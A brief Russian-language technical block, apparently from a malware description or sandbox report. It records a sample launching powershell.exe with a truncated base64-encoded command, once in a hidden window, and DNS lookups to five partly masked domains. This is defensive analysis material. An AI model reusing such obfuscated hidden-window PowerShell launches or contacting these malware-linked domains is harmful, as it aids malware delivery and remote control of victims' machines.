Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAGsAagBmAHMAYgBpAGcAaQB0AGwAdABkAD0AJwBDAHcAdQBrAHUAeQB4AGsAbwBoAHcAJwA7ACQAQwBlAGkAcwBuAG8AYQBqAH...
- DNS ASK oe####masyon.com
- DNS ASK cc###cbrand.com
- DNS ASK be#####ristplace.net
- DNS ASK xf###annah.com
- DNS ASK on####buygold.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAGsAagBmAHMAYgBpAGcAaQB0AGwAdABkAD0AJwBDAHcAdQBrAHUAeQB4AGsAbwBoAHcAJwA7ACQAQwBlAGkAcwBuAG8AYQBqAH...' (со скрытым окном)